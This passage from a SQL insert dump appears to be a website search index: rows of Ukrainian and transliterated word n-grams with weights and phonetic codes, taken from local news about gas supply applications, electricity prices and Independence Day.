один',0,1,1.3667,'о000',1,'*'),(1683060,'обрати один із','обрати один із',0,1,1.4667,'о000',1,'*'),(1683061,'обробка','обробка',0,0,0.4667,'о000',1,'*'),(1683062,'обробка триває','обробка триває',0,1,1.4667,'о000',1,'*'),(1683063,'обробка триває 10-15','обробка триває 10-15',0,1,1.6667,'о000',1,'*'),(1683064,'один із двох','один із двох',0,1,1.4,'о000',1,'*'),(1683065,'оператора','оператора',0,0,0.6,'о000',2,'*'),(1683066,'оператора гтс','оператора гтс',0,1,1.4333,'о000',1,'*'),(1683067,'оператора гтс що','оператора гтс що',0,1,1.5333,'о000',1,'*'),(1683068,'оптимального','оптимального',0,0,0.8,'о000',1,'*'),(1683069,'оптимального тарифного','оптимального тарифного',0,1,1.7333,'о000',1,'*'),(1683070,'оптимального тарифного пакету','оптимального тарифного пакету',0,1,1.9667,'о000',1,'*'),(1683071,'отже','отже',0,0,0.2667,'о000',2,'*'),(1683072,'отже подача','отже подача',0,1,1.3667,'о000',1,'*'),(1683073,'отже подача заявки','отже подача заявки',0,1,1.6,'о000',1,'*'),(1683074,'офіційний','офіційний',0,0,0.6,'о000',1,'*'),(1683075,'офіційний сайт','офіційний сайт',0,1,1.4667,'о000',1,'*'),(1683076,'офіційний сайт гк','офіційний сайт гк',0,1,1.5667,'о000',1,'*'),(1683077,'оформлення','оформлення',0,0,0.6667,'о000',1,'*'),(1683078,'оформлення заявки','оформлення заявки',0,1,1.5667,'о000',1,'*'),(1683079,'оформлення заявки на','оформлення заявки на',0,1,1.6667,'о000',1,'*'),(1683080,'підвантажені','підвантажені',0,0,0.8,'п000',1,'*'),(1683081,'підвантажені з','підвантажені з',0,1,1.4667,'п000',1,'*'),(1683082,'підвантажені з додатку','підвантажені з додатку',0,1,1.7333,'п000',1,'*'),(1683083,'підписом','підписом',0,0,0.5333,'п000',1,'*'),(1683084,'підписом кеп','підписом кеп',0,1,1.4,'п000',1,'*'),(1683085,'підписом кеп або','підписом кеп або',0,1,1.5333,'п000',1,'*'),(1683086,'підпишіть','підпишіть',0,0,0.6,'п000',1,'*'),(1683087,'підпишіть її','підпишіть її',0,1,1.4,'п000',1,'*'),(1683088,'підпишіть її зручним','підпишіть її зручним',0,1,1.6667,'п000',1,'*'),(1683089,'підтвердження','підтвердження',0,0,0.8667,'п000',1,'*'),(1683090,'підтвердження на','підтвердження на',0,1,1.5333,'п000',1,'*'),(1683091,'підтвердження на екраніз\'явиться','підтвердження на екраніз',0,1,2,'п000',1,'*'),(1683092,'підтвердити','підтвердити',0,0,0.7333,'п000',1,'*'),(1683093,'підтвердити передачу','підтвердити передачу',0,1,1.6667,'п000',1,'*'),(1683094,'підтвердити передачу компанії','підтвердити передачу компанії',0,1,1.9667,'п000',1,'*'),(1683095,'після підтвердження','після підтвердження',0,1,1.6333,'п000',1,'*'),(1683096,'після підтвердження на','після підтвердження на',0,1,1.7333,'п000',1,'*'),(1683097,'пакету','пакету',0,0,0.4,'п000',1,'*'),(1683098,'пакету для','пакету для',0,1,1.3333,'п000',1,'*'),(1683099,'пакету для купівлі','пакету для купівлі',0,1,1.6,'п000',1,'*'),(1683100,'передачу','передачу',0,0,0.5333,'п000',1,'*'),(1683101,'передачу компанії','передачу компанії',0,1,1.5667,'п000',1,'*'),(1683102,'передачу компанії гк','передачу компанії гк',0,1,1.6667,'п000',1,'*'),(1683103,'перейдіть','перейдіть',0,0,0.6,'п000',1,'*'),(1683104,'перейдіть на','перейдіть на',0,1,1.4,'п000',1,'*'),(1683105,'перейдіть на офіційний','перейдіть на офіційний',0,1,1.7333,'п000',1,'*'),(1683106,'платформі','платформі',0,0,0.6,'п000',1,'*'),(1683107,'платформі оператора','платформі оператора',0,1,1.6333,'п000',1,'*'),(1683108,'платформі оператора гтс','платформі оператора гтс',0,1,1.7667,'п000',1,'*'),(1683109,'податковий','податковий',0,0,0.6667,'п000',1,'*'),(1683110,'податковий номер','податковий номер',0,1,1.5333,'п000',1,'*'),(1683111,'податковий номер оберіть','податковий номер оберіть',0,1,1.8,'п000',1,'*'),(1683112,'подачі','подачі',0,0,0.4,'п000',1,'*'),(1683113,'подачі заявки','подачі заявки',0,1,1.4333,'п000',1,'*'),(1683114,'подачі заявки «сайт»','подачі заявки «сайт»',0,1,1.6667,'п000',1,'*'),(1683115,'подача','подача',0,0,0.4,'п000',1,'*'),(1683116,'подача заявки','подача заявки',0,1,1.4333,'п000',1,'*'),(1683117,'подача заявки на','подача заявки на',0,1,1.5333,'п000',1,'*'),(1683118,'покрокова','покрокова',0,0,0.6,'п000',1,'*'),(1683119,'покрокова інструкція','покрокова інструкція',0,1,1.6667,'п000',1,'*'),(1683120,'покрокова інструкція 1','покрокова інструкція 1',0,1,1.7333,'п000',1,'*'),(1683121,'поля','поля',0,0,0.2667,'п000',1,'*'),(1683122,'поля необхідною','поля необхідною',0,1,1.5,'п000',1,'*'),(1683123,'поля необхідною інформацією','поля необхідною інформацією',0,1,1.9,'п000',1,'*'),(1683124,'постачальника газу гк','постачальника газу гк',0,1,1.7,'п000',1,'*'),(1683125,'постачальника газу тепер','постачальника газу тепер',0,1,1.8,'п000',1,'*'),(1683126,'постачальника щоб','постачальника щоб',0,1,1.5667,'п000',1,'*'),(1683127,'постачальника щоб завершити','постачальника щоб завершити',0,1,1.9,'п000',1,'*'),(1683128,'потрібно підтвердити','потрібно підтвердити',0,1,1.6667,'п000',1,'*'),(1683129,'потрібно підтвердити передачу','потрібно підтвердити передачу',0,1,1.9667,'п000',1,'*'),(1683130,'приєднання','приєднання',0,0,0.6667,'п000',1,'*'),(1683131,'приєднання до','приєднання до',0,1,1.4333,'п000',1,'*'),(1683132,'приєднання до газопостачання','приєднання до газопостачання',0,1,1.9333,'п000',1,'*'),(1683133,'приєднання займе','приєднання займе',0,1,1.5333,'п000',1,'*'),(1683134,'приєднання займе всього','приєднання займе всього',0,1,1.7667,'п000',1,'*'),(1683135,'приєднатися','приєднатися',0,0,0.7333,'п000',1,'*'),(1683136,'приєднатися до','приєднатися до',0,1,1.4667,'п000',1,'*'),(1683137,'приєднатися до державного','приєднатися до державного',0,1,1.8333,'п000',1,'*'),(1683138,'просто натисніть','просто натисніть',0,1,1.5333,'п000',1,'*'),(1683139,'просто натисніть на','просто натисніть на',0,1,1.6333,'п000',1,'*'),(1683140,'процес натисніть','процес натисніть',0,1,1.5333,'п000',1,'*'),(1683141,'процес натисніть «сформувати','процес натисніть «сформувати',0,1,1.9333,'п000',1,'*'),(1683142,'раніше іпн','раніше іпн',0,1,1.3333,'р000',1,'*'),(1683143,'раніше іпн індивідуальний','раніше іпн індивідуальний',0,1,1.8333,'р000',1,'*'),(1683144,'рнокпп','рнокпп',0,0,0.4,'р000',1,'*'),(1683145,'рнокпп раніше','рнокпп раніше',0,1,1.4333,'р000',1,'*'),(1683146,'рнокпп раніше іпн','рнокпп раніше іпн',0,1,1.5667,'р000',1,'*'),(1683147,'розділ','розділ',0,0,0.4,'р000',1,'*'),(1683148,'розділ «стати','розділ «стати',0,1,1.4333,'р000',1,'*'),(1683149,'розділ «стати нашим','розділ «стати нашим',0,1,1.6333,'р000',1,'*'),(1683150,'руки отже','руки отже',0,1,1.3,'р000',1,'*'),(1683151,'руки отже подача','руки отже подача',0,1,1.5333,'р000',1,'*'),(1683152,'сайт','сайт',0,0,0.2667,'с000',1,'*'),(1683153,'сайт гк','сайт гк',0,1,1.2333,'с000',1,'*'),(1683154,'сайт гк «нафтогаз','сайт гк «нафтогаз',0,1,1.5667,'с000',1,'*'),(1683155,'сайті','сайті',0,0,0.3333,'с000',2,'*'),(1683156,'сайті компанії','сайті компанії',0,1,1.4667,'с000',1,'*'),(1683157,'сайті компанії gas','сайті компанії gas',0,1,1.6,'с200',1,'*'),(1683158,'сайту просто','сайту просто',0,1,1.4,'с000',1,'*'),(1683159,'сайту просто натисніть','сайту просто натисніть',0,1,1.7333,'с000',1,'*'),(1683160,'саме той','саме той',0,1,1.2667,'с000',1,'*'),(1683161,'саме той документ','саме той документ',0,1,1.5667,'с000',1,'*'),(1683162,'серед запропонованих','серед запропонованих',0,1,1.6667,'с000',1,'*'),(1683163,'серед запропонованих способів','серед запропонованих способів',0,1,1.9667,'с000',1,'*'),(1683164,'середньому три','середньому три',0,1,1.4667,'с000',1,'*'),(1683165,'середньому три дні','середньому три дні',0,1,1.6,'с000',1,'*'),(1683166,'система','система',0,0,0.4667,'с000',1,'*'),(1683167,'система запропонує','система запропонує',0,1,1.6,'с000',1,'*'),(1683168,'система запропонує вам','система запропонує вам',0,1,1.7333,'с000',1,'*'),(1683169,'смартфоні','смартфоні',0,0,0.6,'с000',1,'*'),(1683170,'смартфоні потрібно','смартфоні потрібно',0,1,1.6,'с000',1,'*'),(1683171,'смартфоні потрібно підтвердити','смартфоні потрібно підтвердити',0,1,2,'с000',1,'*'),(1683172,'способів','способів',0,0,0.5333,'с000',1,'*'),(1683173,'способів заповнення','способів заповнення',0,1,1.6333,'с000',1,'*'),(1683174,'способів заповнення заявки','способів заповнення заявки',0,1,1.8667,'с000',1,'*'),(1683175,'способом електронним','способом електронним',0,1,1.6667,'с000',1,'*'),(1683176,'способом електронним підписом','способом електронним підписом',0,1,1.9667,'с000',1,'*'),(1683177,'стати клієнтом','стати клієнтом',0,1,1.4667,'с000',1,'*'),(1683178,'стати клієнтом газопостачальної','стати клієнтом газопостачальної',0,1,2,'с000',1,'*'),(1683179,'та відскануйте','та відскануйте',0,1,1.4667,'т000',1,'*'),(1683180,'та відскануйте запропонований','та відскануйте запропонований',0,1,1.9667,'т000',1,'*'),(1683181,'та верифіковано','та верифіковано',0,1,1.5,'т000',1,'*'),(1683182,'та верифіковано у','та верифіковано у',0,1,1.5667,'т000',1,'*'),(1683183,'та зручно','та зручно',0,1,1.3,'т000',1,'*'),(1683184,'та зручно стати','та зручно стати',0,1,1.5,'т000',1,'*'),(1683185,'та натисніть','та натисніть',0,1,1.4,'т000',1,'*'),(1683186,'та натисніть «подати','та натисніть «подати',0,1,1.6667,'т000',1,'*'),(1683187,'та підпишіть','та підпишіть',0,1,1.4,'т000',1,'*'),(1683188,'та підпишіть її','та підпишіть її',0,1,1.5,'т000',1,'*'),(1683189,'таким чином вибір','таким чином вибір',0,1,1.5667,'т000',1,'*'),(1683190,'тарифного пакету','тарифного пакету',0,1,1.5333,'т000',1,'*'),(1683191,'тарифного пакету для','тарифного пакету для',0,1,1.6667,'т000',1,'*'),(1683192,'тепер можна','тепер можна',0,1,1.3667,'т000',1,'*'),(1683193,'тепер можна через','тепер можна через',0,1,1.5667,'т000',1,'*'),(1683194,'той документ','той документ',0,1,1.4,'т000',1,'*'),(1683195,'той документ який','той документ який',0,1,1.5667,'т000',1,'*'),(1683196,'три','три',0,0,0.2,'т000',1,'*'),(1683197,'три дні','три дні',0,1,1.2333,'т000',1,'*'),(1683198,'три дні https','три дні https',0,1,1.4333,'т312',1,'*'),(1683199,'триває 10-15','триває 10-15',0,1,1.4,'т000',1,'*'),(1683200,'триває 10-15 хвилин','триває 10-15 хвилин',0,1,1.6333,'т000',1,'*'),(1683201,'триває в','триває в',0,1,1.2667,'т000',1,'*'),(1683202,'триває в середньому','триває в середньому',0,1,1.6333,'т000',1,'*'),(1683203,'у вашому','у вашому',0,1,1.2667,'у000',1,'*'),(1683204,'у вашому застосунку','у вашому застосунку',0,1,1.6333,'у000',1,'*'),(1683205,'у кілька','у кілька',0,1,1.2667,'у000',1,'*'),(1683206,'у кілька кліків','у кілька кліків',0,1,1.5,'у000',1,'*'),(1683207,'у мобільній','у мобільній',0,1,1.3667,'у000',1,'*'),(1683208,'у мобільній версії','у мобільній версії',0,1,1.6,'у000',1,'*'),(1683209,'у розділ','у розділ',0,1,1.2667,'у000',1,'*'),(1683210,'у розділ «стати','у розділ «стати',0,1,1.5,'у000',1,'*'),(1683211,'україни»','україни»',0,0,0.5333,'у000',1,'*'),(1683212,'україни» gas','україни» gas',0,1,1.4,'у200',1,'*'),(1683213,'україни» gas ua','україни» gas ua',0,1,1.5,'у200',1,'*'),(1683214,'україни» із','україни» із',0,1,1.3667,'у000',1,'*'),(1683215,'україни» із частково','україни» із частково',0,1,1.6667,'у000',1,'*'),(1683216,'україни» копій','україни» копій',0,1,1.4667,'у000',1,'*'),(1683217,'україни» копій обраного','україни» копій обраного',0,1,1.7667,'у000',1,'*'),(1683218,'україни» тепер','україни» тепер',0,1,1.4667,'у000',1,'*'),(1683219,'україни» тепер можна','україни» тепер можна',0,1,1.6667,'у000',1,'*'),(1683220,'україни» через','україни» через',0,1,1.4667,'у000',1,'*'),(1683221,'україни» через «дію»','україни» через «дію»',0,1,1.6667,'у000',1,'*'),(1683222,'урахування','урахування',0,0,0.6667,'у000',1,'*'),(1683223,'урахування актуалізації','урахування актуалізації',0,1,1.7667,'у000',1,'*'),(1683224,'урахування актуалізації даних','урахування актуалізації даних',0,1,1.9667,'у000',1,'*'),(1683225,'файл','файл',0,0,0.2667,'ф000',1,'*'),(1683226,'файл заявки»','файл заявки»',0,1,1.4,'ф000',1,'*'),(1683227,'файл заявки» та','файл заявки» та',0,1,1.5,'ф000',1,'*'),(1683228,'хвилин','хвилин',0,0,0.4,'х000',1,'*'),(1683229,'хвилин без','хвилин без',0,1,1.3333,'х000',1,'*'),(1683230,'хвилин без урахування','хвилин без урахування',0,1,1.7,'х000',1,'*'),(1683231,'хвилин як','хвилин як',0,1,1.3,'х000',1,'*'),(1683232,'хвилин як швидко','хвилин як швидко',0,1,1.5333,'х000',1,'*'),(1683233,'цифрового','цифрового',0,0,0.6,'ц000',1,'*'),(1683234,'цифрового документу','цифрового документу',0,1,1.6333,'ц000',1,'*'),(1683235,'цифрового документу натиснувши','цифрового документу натиснувши',0,1,2,'ц000',1,'*'),(1683236,'частково заповненими','частково заповненими',0,1,1.6667,'ч000',1,'*'),(1683237,'частково заповненими даними','частково заповненими даними',0,1,1.9,'ч000',1,'*'),(1683238,'через «дію»','через «дію»',0,1,1.3667,'ч000',1,'*'),(1683239,'через «дію» покрокова','через «дію» покрокова',0,1,1.7,'ч000',1,'*'),(1683240,'через дію».','через дію».',0,1,1.3667,'ч000',1,'*'),(1683241,'через дію». після','через дію». після',0,1,1.5667,'ч000',1,'*'),(1683242,'через застосунок','через застосунок',0,1,1.5333,'ч000',1,'*'),(1683243,'через застосунок «дія».','через застосунок «дія».',0,1,1.7667,'ч000',1,'*'),(1683244,'чином вибір','чином вибір',0,1,1.3667,'ч000',1,'*'),(1683245,'чином вибір оптимального','чином вибір оптимального',0,1,1.8,'ч000',1,'*'),(1683246,'швидко та','швидко та',0,1,1.3,'ш000',1,'*'),(1683247,'швидко та зручно','швидко та зручно',0,1,1.5333,'ш000',1,'*'),(1683248,'що триває','що триває',0,1,1.3,'щ000',1,'*'),(1683249,'що триває в','що триває в',0,1,1.3667,'щ000',1,'*'),(1683250,'щоб завершити','щоб завершити',0,1,1.4333,'щ000',1,'*'),(1683251,'щоб завершити процес','щоб завершити процес',0,1,1.6667,'щ000',1,'*'),(1683252,'як швидко','як швидко',0,1,1.3,'я000',1,'*'),(1683253,'як швидко та','як швидко та',0,1,1.4,'я000',1,'*'),(1683254,'які будуть','які будуть',0,1,1.3333,'я000',1,'*'),(1683255,'які будуть підвантажені','які будуть підвантажені',0,1,1.7667,'я000',1,'*'),(1683256,'який додано','який додано',0,1,1.3667,'я000',1,'*'),(1683257,'який додано та','який додано та',0,1,1.4667,'я000',1,'*'),(1683258,'якщо ж','якщо ж',0,1,1.2,'я000',1,'*'),(1683259,'якщо ж ви','якщо ж ви',0,1,1.3,'я000',1,'*'),(1683717,'2 2529','2 2529',0,1,1.2,'',1,'*'),(1683718,'2 2529 vikonannya','2 2529 vikonannya',0,1,1.5667,'V250',1,'*'),(1683719,'2529','2529',0,0,0.4,'',1,'*'),(1683720,'2529 vikonannya','2529 vikonannya',0,1,1.5,'V250',1,'*'),(1683721,'2529 vikonannya dokhidnoji','2529 vikonannya dokhidnoji',0,1,1.8667,'V2532352',1,'*'),(1683722,'novini 2 2529','novini 2 2529',0,1,1.4333,'N150',1,'*'),(1683723,'oblasti za pershe','oblasti za pershe',0,1,1.5667,'O14232162',1,'*'),(1683724,'pershe','pershe',0,0,0.4,'P620',1,'*'),(1683725,'pershe pivrichchya','pershe pivrichchya',0,1,1.6,'P62162',1,'*'),(1683726,'pershe pivrichchya 2021','pershe pivrichchya 2021',0,1,1.7667,'P62162',1,'*'),(1683727,'pivrichchya','pivrichchya',0,0,0.7333,'P620',1,'*'),(1683728,'pivrichchya 2021','pivrichchya 2021',0,1,1.5333,'P620',1,'*'),(1683729,'pivrichchya 2021 roku','pivrichchya 2021 roku',0,1,1.7,'P6262',1,'*'),(1683730,'za pershe','za pershe',0,1,1.3,'Z162',1,'*'),(1683731,'za pershe pivrichchya','za pershe pivrichchya',0,1,1.7,'Z162162',1,'*'),(1683732,'за перше','за перше',0,1,1.2667,'з000',1,'*'),(1683733,'за перше півріччя','за перше півріччя',0,1,1.5667,'з000',1,'*'),(1683734,'області за перше','області за перше',0,1,1.5333,'о000',1,'*'),(1683735,'півріччя','півріччя',0,0,0.5333,'п000',1,'*'),(1683736,'півріччя 2021','півріччя 2021',0,1,1.4333,'п000',1,'*'),(1683737,'півріччя 2021 року','півріччя 2021 року',0,1,1.6,'п000',1,'*'),(1683738,'перше','перше',0,0,0.3333,'п000',1,'*'),(1683739,'перше півріччя','перше півріччя',0,1,1.4667,'п000',1,'*'),(1683740,'перше півріччя 2021','перше півріччя 2021',0,1,1.6333,'п000',1,'*'),(1683748,'1 zhovtnya','1 zhovtnya',0,1,1.3333,'Z135',1,'*'),(1683749,'1 zhovtnya 21','1 zhovtnya 21',0,1,1.4333,'Z135',1,'*'),(1683750,'1 жовтня','1 жовтня',0,1,1.2667,'ж000',3,'*'),(1683751,'1 жовтня 21','1 жовтня 21',0,1,1.3667,'ж000',1,'*'),(1683752,'2 2530','2 2530',0,1,1.2,'',1,'*'),(1683753,'2 2530 vartist','2 2530 vartist',0,1,1.4667,'V6323',1,'*'),(1683754,'21 roku','21 roku',0,1,1.2333,'R200',1,'*'),(1683755,'2530','2530',0,0,0.4,'',1,'*'),(1683756,'2530 vartist','2530 vartist',0,1,1.4,'V6323',1,'*'),(1683757,'2530 vartist elektroenergiji','2530 vartist elektroenergiji',0,1,1.9333,'V63234236562',1,'*'),(1683758,'elektroenergiji','elektroenergiji',0,0,1,'E4236562',1,'*'),(1683759,'elektroenergiji z','elektroenergiji z',0,1,1.5667,'E4236562',1,'*'),(1683760,'elektroenergiji z 1','elektroenergiji z 1',0,1,1.6333,'E4236562',1,'*'),(1683761,'novini 2 2530','novini 2 2530',0,1,1.4333,'N150',1,'*'),(1683762,'vartist elektroenergiji','vartist elektroenergiji',0,1,1.7667,'V63234236562',1,'*'),(1683763,'vartist elektroenergiji z','vartist elektroenergiji z',0,1,1.8333,'V63234236562',1,'*'),(1683764,'z 1','z 1',0,1,1.1,'Z000',1,'*'),(1683765,'z 1 zhovtnya','z 1 zhovtnya',0,1,1.4,'Z135',1,'*'),(1683766,'zhovtnya 21','zhovtnya 21',0,1,1.3667,'Z135',1,'*'),(1683767,'zhovtnya 21 roku','zhovtnya 21 roku',0,1,1.5333,'Z13562',1,'*'),(1683768,'вартість електроенергії','вартість електроенергії',0,1,1.7667,'в000',1,'*'),(1683769,'вартість електроенергії з','вартість електроенергії з',0,1,1.8333,'в000',1,'*'),(1683770,'електроенергії','електроенергії',0,0,0.9333,'е000',1,'*'),(1683771,'електроенергії з','електроенергії з',0,1,1.5333,'е000',1,'*'),(1683772,'електроенергії з 1','електроенергії з 1',0,1,1.6,'е000',1,'*'),(1683773,'жовтня 21','жовтня 21',0,1,1.3,'ж000',1,'*'),(1683774,'жовтня 21 року','жовтня 21 року',0,1,1.4667,'ж000',1,'*'),(1683775,'з 1 жовтня','з 1 жовтня',0,1,1.3333,'з000',2,'*'),(1683779,'2531','2531',0,0,0.4,'',1,'*'),(1683780,'2531 zaryadka','2531 zaryadka',0,1,1.4333,'Z632',1,'*'),(1683781,'2531 zaryadka pered','2531 zaryadka pered',0,1,1.6333,'Z632163',1,'*'),(1683782,'holuby poshtovi 2531','holuby poshtovi 2531',0,1,1.6667,'H41231',1,'*'),(1683783,'pered','pered',0,0,0.3333,'P630',1,'*'),(1683784,'pered snidankom','pered snidankom',0,1,1.5,'P63253525',1,'*'),(1683785,'poshtovi 2531','poshtovi 2531',0,1,1.4333,'P231',1,'*'),(1683786,'poshtovi 2531 zaryadka','poshtovi 2531 zaryadka',0,1,1.7333,'P2312632',1,'*'),(1683787,'snidankom','snidankom',0,0,0.6,'S53525',1,'*'),(1683788,'zaryadka','zaryadka',0,0,0.5333,'Z632',1,'*'),(1683789,'zaryadka pered','zaryadka pered',0,1,1.4667,'Z632163',1,'*'),(1683790,'zaryadka pered snidankom','zaryadka pered snidankom',0,1,1.8,'Z632163253525',1,'*'),(1683791,'зарядка','зарядка',0,0,0.4667,'з000',1,'*'),(1683792,'зарядка перед','зарядка перед',0,1,1.4333,'з000',1,'*'),(1683793,'зарядка перед сніданком','зарядка перед сніданком',0,1,1.7667,'з000',1,'*'),(1683794,'перед сніданком','перед сніданком',0,1,1.5,'п000',1,'*'),(1683795,'сніданком','сніданком',0,0,0.6,'с000',1,'*'),(1683810,'2532','2532',0,0,0.4,'',1,'*'),(1683811,'2532 snidanok','2532 snidanok',0,1,1.4333,'S5352',1,'*'),(1683812,'2532 snidanok poshtovikh','2532 snidanok poshtovikh',0,1,1.8,'S535212312',1,'*'),(1683813,'holuby poshtovi 2532','holuby poshtovi 2532',0,1,1.6667,'H41231',1,'*'),(1683814,'poshtovi 2532','poshtovi 2532',0,1,1.4333,'P231',1,'*'),(1683815,'poshtovi 2532 snidanok','poshtovi 2532 snidanok',0,1,1.7333,'P23125352',1,'*'),(1683816,'poshtovikh','poshtovikh',0,0,0.6667,'P2312',1,'*'),(1683817,'poshtovikh golubiv','poshtovikh golubiv',0,1,1.6,'P231241',1,'*'),(1683818,'snidanok poshtovikh','snidanok poshtovikh',0,1,1.6333,'S535212312',1,'*'),(1683819,'snidanok poshtovikh golubiv','snidanok poshtovikh golubiv',0,1,1.9,'S53521231241',1,'*'),(1683820,'поштових голубів','поштових голубів',0,1,1.5333,'п000',1,'*'),(1683821,'сніданок поштових','сніданок поштових',0,1,1.5667,'с000',1,'*'),(1683822,'сніданок поштових голубів','сніданок поштових голубів',0,1,1.8333,'с000',1,'*'),(1683951,'2 2533','2 2533',0,1,1.2,'',1,'*'),(1683952,'2 2533 z','2 2533 z',0,1,1.2667,'Z000',1,'*'),(1683953,'2533','2533',0,0,0.4,'',1,'*'),(1683954,'2533 z','2533 z',0,1,1.2,'Z000',1,'*'),(1683955,'2533 z dnem','2533 z dnem',0,1,1.3667,'Z350',1,'*'),(1683956,'dnem','dnem',0,0,0.2667,'D500',2,'*'),(1683957,'dnem nezalezhnosti','dnem nezalezhnosti',0,1,1.6,'D5242523',1,'*'),(1683958,'dnem nezalezhnosti ukrajini','dnem nezalezhnosti ukrajini',0,1,1.9,'D52425232625',1,'*'),(1683959,'nezalezhnosti','nezalezhnosti',0,0,0.8667,'N242523',1,'*'),(1683960,'nezalezhnosti ukrajini','nezalezhnosti ukrajini',0,1,1.7333,'N2425232625',1,'*'),(1683961,'novini 2 2533','novini 2 2533',0,1,1.4333,'N150',1,'*'),(1683962,'z dnem','z dnem',0,1,1.2,'Z350',2,'*'),(1683963,'z dnem nezalezhnosti','z dnem nezalezhnosti',0,1,1.6667,'Z35242523',1,'*'),(1683964,'вчинків','вчинків',0,0,0.4667,'в000',1,'*'),(1683965,'вчинків наших','вчинків наших',0,1,1.4333,'в000',1,'*'),(1683966,'вчинків наших думок','вчинків наших думок',0,1,1.6333,'в000',1,'*'),(1683967,'днем незалежності','днем незалежності',0,1,1.5667,'д000',1,'*'),(1683968,'днем незалежності україни','днем незалежності україни',0,1,1.8333,'д000',1,'*'),(1683969,'думок','думок',0,0,0.3333,'д000',1,'*'),(1683970,'думок наших','думок наших',0,1,1.3667,'д000',1,'*'),(1683971,'думок наших рішень','думок наших рішень',0,1,1.6,'д000',1,'*'),(1683972,'з днем','з днем',0,1,1.2,'з000',2,'*'),(1683973,'з днем незалежності','з днем незалежності',0,1,1.6333,'з000',1,'*'),(1683974,'з кожного','з кожного',0,1,1.3,'з000',1,'*'),(1683975,'з кожного з','з кожного з',0,1,1.3667,'з000',1,'*'),(1683976,'з нас','з нас',0,1,1.1667,'з000',1,'*'),(1683977,'з нас наших','з нас наших',0,1,1.3667,'з000',1,'*'),(1683978,'завжди починається','завжди починається',0,1,1.6,'з000',1,'*'),(1683979,'завжди починається з','завжди починається з',0,1,1.6667,'з000',1,'*'),(1683980,'кожного з','кожного з',0,1,1.3,'к000',1,'*'),(1683981,'кожного з нас','кожного з нас',0,1,1.4333,'к000',1,'*'),(1683982,'нас наших','нас наших',0,1,1.3,'н000',1,'*'),(1683983,'нас наших вчинків','нас наших вчинків',0,1,1.5667,'н000',1,'*'),(1683984,'наших','наших',0,0,0.3333,'н000',1,'*'),(1683985,'наших вчинків','наших вчинків',0,1,1.4333,'н000',1,'*'),(1683986,'наших вчинків наших','наших вчинків наших',0,1,1.6333,'н000',1,'*'),(1683987,'наших думок','наших думок',0,1,1.3667,'н000',1,'*'),(1683988,'наших думок наших','наших думок наших',0,1,1.5667,'н000',1,'*'),(1683989,'наших рішень','наших рішень',0,1,1.4,'н000',1,'*'),(1683990,'незалежність завжди','незалежність завжди',0,1,1.6333,'н000',1,'*'),(1683991,'незалежність завжди починається','незалежність завжди починається',0,1,2,'н000',1,'*'),(1683992,'незалежності','незалежності',0,0,0.8,'н000',1,'*'),(1683993,'незалежності україни','незалежності україни',0,1,1.6667,'н000',1,'*'),(1683994,'починається з','починається з',0,1,1.4333,'п000',1,'*'),(1683995,'починається з кожного','починається з кожного',0,1,1.7,'п000',1,'*'),(1683996,'рішень','рішень',0,0,0.4,'р000',1,'*'),(1684014,'1130','1130',0,0,0.4,'',1,'*'),(1684015,'1130 rokiv','1130 rokiv',0,1,1.3333,'R210',1,'*'),(1684016,'1130 років','1130 років',0,1,1.3333,'р000',1,'*'),(1684017,'2 2534','2 2534',0,1,1.2,'',1,'*'),(1684018,'2 2534 malinu','2 2534 malinu',0,1,1.4333,'M450',1,'*'),(1684019,'2534','2534',0,0,0.4,'',1,'*'),(1684020,'2534 malinu','2534 malinu',0,1,1.3667,'M450',1,'*'),(1684021,'2534 malinu 1130','2534 malinu 1130',0,1,1.5333,'M450',1,'*'),(1684022,'malinu','malinu',0,0,0.4,'M450',1,'*'),(1684023,'malinu 1130','malinu 1130',0,1,1.3667,'M450',1,'*'),(1684024,'malinu 1130 rokiv','malinu 1130 rokiv',0,1,1.5667,'M45621',1,'*'),(1684025,'novini 2 2534','novini 2 2534',0,1,1.4333,'N150',1,'*'),(1684026,'rokiv','rokiv',0,0,0.3333,'R210',1,'*'),(1684027,'малину','малину',0,0,0.4,'м000',1,'*'),(1684028,'малину 1130','малину 1130',0,1,1.3667,'м000',1,'*'),(1684029,'малину 1130 років','малину 1130 років',0,1,1.5667,'м000',1,'*'),(1686091,'1 12','1 12',0,1,1.1333,'',1,'*'),(1686092,'1 12 річної','1 12 річної',0,1,1.3667,'р000',1,'*'),(1686093,'1 жовтня 2020','1 жовтня 2020',0,1,1.4333,'ж000',2,'*'),(1686094,'1 розрахунки','1 розрахунки',0,1,1.4,'р000',1,'*'),(1686095,'1 розрахунки споживача','1 розрахунки споживача',0,1,1.7333,'р000',1,'*'),(1686096,'12 річної','12 річної',0,1,1.3,'р000',1,'*'),(1686097,'12 річної замовленоїпотужності','12 річної замовленоїпотужності',0,1,2,'р000',1,'*'),(1686098,'2 2535','2 2535',0,1,1.2,'',1,'*'),(1686099,'2 2535 30','2 2535 30',0,1,1.3,'',1,'*'),(1686100,'2 місячна','2 місячна',0,1,1.3,'м000',1,'*'),(1686101,'2 місячна вартість','2 місячна вартість',0,1,1.6,'м000',1,'*'),(1686102,'2020 року по','2020 року по',0,1,1.4,'р000',2,'*'),(1686103,'2021 roku ostannij','2021 roku ostannij',0,1,1.6,'R2352',1,'*'),(1686104,'2021 року а','2021 року а',0,1,1.3667,'р000',1,'*'),(1686105,'2021 року буде','2021 року буде',0,1,1.4667,'р000',1,'*'),(1686106,'2021 року останній','2021 року останній',0,1,1.6,'р000',1,'*'),(1686107,'2021 року переконайтесь','2021 року переконайтесь',0,1,1.7667,'р000',1,'*'),(1686108,'2021 року усім','2021 року усім',0,1,1.4667,'р000',1,'*'),(1686109,'2022 року і','2022 року і',0,1,1.3667,'р000',1,'*'),(1686110,'2022 року будьте','2022 року будьте',0,1,1.5333,'р000',1,'*'),(1686111,'2535','2535',0,0,0.4,'',1,'*'),(1686112,'2535 30','2535 30',0,1,1.2333,'',1,'*'),(1686113,'2535 30 veresnya','2535 30 veresnya',0,1,1.5333,'V625',1,'*'),(1686114,'3 річна','3 річна',0,1,1.2333,'р000',1,'*'),(1686115,'3 річна замовлена','3 річна замовлена',0,1,1.5667,'р000',1,'*'),(1686116,'30 veresnya','30 veresnya',0,1,1.3667,'V625',1,'*'),(1686117,'30 veresnya 2021','30 veresnya 2021',0,1,1.5333,'V625',1,'*'),(1686118,'30 вересня','30 вересня',0,1,1.3333,'в000',2,'*'),(1686119,'30 вересня 2021','30 вересня 2021',0,1,1.5,'в000',2,'*'),(1686120,'5 жовтня','5 жовтня',0,1,1.2667,'ж000',1,'*'),(1686121,'5 жовтня 2021','5 жовтня 2021',0,1,1.4333,'ж000',1,'*'),(1686122,'den potochnogo','den potochnogo',0,1,1.4667,'D513252',1,'*'),(1686123,'den potochnogo 